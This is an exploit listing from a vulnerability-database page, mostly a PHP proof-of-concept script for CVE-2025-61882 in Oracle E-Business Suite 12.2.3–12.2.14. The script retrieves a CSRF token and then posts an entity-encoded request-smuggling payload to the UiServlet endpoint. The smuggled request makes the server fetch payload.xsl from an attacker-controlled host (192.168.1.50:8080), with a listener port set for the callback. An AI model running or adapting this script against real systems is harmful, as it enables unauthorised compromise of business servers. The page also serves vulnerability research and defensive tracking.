Vulners
Lucene search
📄 Oracle E-Business Suite 12.2.3 Request Smuggling
10
=============================================================================================================================================
| # Title : Oracle E-Business Suite 12.2.3 through 12.2.14 Corrected Request Smuggling Exploit with Enhanced CSRF Token Extraction |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.oracle.com/applications/ebusiness/ |
=============================================================================================================================================
[+] References: https://packetstorm.news/files/id/214189/ & CVE-2025-61882
[+] Summary: This script is a refined proof-of-concept targeting Oracle E‑Business Suite (EBS) vulnerability CVE‑2025‑61882.
It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring reliable proxy/backend desynchronization.
The exploit also improves CSRF token extraction by prioritizing response headers (modern EBS behavior) with a fallback to parsing the response body.
Additional fixes harden URL parsing (scheme/host/port handling) to avoid runtime warnings while preserving the original structure.
The result is a more stable, context-aware exploit workflow suitable for controlled security testing and research.
[+] POC : php poc.php
<?php
class OracleEBSCVE202561882Exploit {
private $target;
private $targetPort = 8000;
private $srvHost;
private $srvPort;
private $lhost;
private $lport;
private $verbose = false;
private $cookies = [];
private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
private $useHttps = false;
public function __construct($options) {
$this->target = $options['target'] ?? null;
$this->lhost = $options['lhost'] ?? null;
$this->lport = $options['lport'] ?? null;
$this->srvHost = $options['srvHost'] ?? '127.0.0.1';
$this->srvPort = $options['srvPort'] ?? 8080;
$this->verbose = $options['verbose'] ?? false;
if ($this->target) {
$parsed = parse_url($this->target);
if ($parsed !== false) {
$scheme = $parsed['scheme'] ?? 'http';
$this->useHttps = ($scheme === 'https');
$this->target = $parsed['host'] ?? $this->target;
$this->targetPort = $parsed['port'] ?? ($this->useHttps ? 443 : 80);
}
}
}
private function retrieveCsrfTokenImproved() {
$url = $this->buildUrl('/OA_HTML/JavaScriptServlet');
$headers = [
'CSRF-XHR: YES',
'FETCH-CSRF-TOKEN: 1',
'X-Requested-With: XMLHttpRequest'
];
$response = $this->httpRequest('POST', $url, '', $headers, true);
if (preg_match('/X-ORACLE-DBC-CSRF-TOKEN:\s*([a-zA-Z0-9\-]+)/i', $response, $m)) {
return trim($m[1]);
}
if (preg_match('/"csrfToken"\s*:\s*"([^"]+)"/', $response, $m)) {
return $m[1];
}
return false;
}
private function createSmugglePayloadImproved($xslUrl) {
$parsedXsl = parse_url($xslUrl);
$xslHost = $parsedXsl['host'] ?? $this->srvHost;
$xslPath = $parsedXsl['path'] ?? '/payload.xsl';
$smuggled = "GET {$xslPath} HTTP/1.1\r\n";
$smuggled .= "Host: {$xslHost}\r\n";
$smuggled .= "User-Agent: Oracle-Internal/1.0\r\n";
$smuggled .= "Connection: keep-alive\r\n\r\n";
$payload = "0\r\n\r\n";
$payload .= $smuggled;
return $this->encodeSmugglePayload($payload);
}
private function encodeSmugglePayload($payload) {
$encoded = '';
$len = strlen($payload);
for ($i = 0; $i < $len; $i++) {
$c = $payload[$i];
if ($c === "\r" || $c === "\n") {
$encoded .= $c;
} else {
$encoded .= '&#' . ord($c) . ';';
}
}
return $encoded;
}
public function exploit() {
$this->log("Attempting to retrieve CSRF token...", "info");
$token = $this->retrieveCsrfTokenImproved();
if (!$token) {
$this->log("Failed to retrieve CSRF token, smuggling may be unreliable.", "warning");
}
$xslUrl = "http://{$this->srvHost}:{$this->srvPort}/payload.xsl";
$smuggleData = $this->createSmugglePayloadImproved($xslUrl);
$xml = "<?xml version='1.0' encoding='UTF-8'?>";
$xml .= "<initialize>";
$xml .= "<param name='return_url'>http://internal.ebs.local{$smuggleData}</param>";
$xml .= "<param name='ui_type'>Applet</param>";
$xml .= "</initialize>";
$url = $this->buildUrl('/OA_HTML/configurator/UiServlet');
$postData = http_build_query([
'redirectFromJsp' => '1',
'getUiType' => $xml,
'oa_csrf_token' => $token
]);
$this->log("Sending smuggling payload to UiServlet...", "info");
$this->httpRequest('POST', $url, $postData, [
'Content-Type: application/x-www-form-urlencoded'
]);
$this->log("Payload sent. Monitor your HTTP server and listener.", "success");
}
private function httpRequest($method, $url, $data = '', $headers = [], $returnFull = false) {
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_CUSTOMREQUEST => $method,
CURLOPT_HEADER => $returnFull,
CURLOPT_HTTPHEADER => array_merge(
["User-Agent: {$this->userAgent}"],
$headers
)
]);
if ($method === 'POST') {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
private function buildUrl($path) {
$scheme = $this->useHttps ? 'https' : 'http';
return "{$scheme}://{$this->target}:{$this->targetPort}{$path}";
}
private function log($msg, $type) {
echo "[{$type}] {$msg}\n";
}
}
$options = [
'target' => 'http://192.168.1.100:8000',
'lhost' => '192.168.1.50',
'lport' => 4444,
'srvHost' => '192.168.1.50',
'srvPort' => 8080
];
$exploit = new OracleEBSCVE202561882Exploit($options);
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Jan 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.8949
SSVC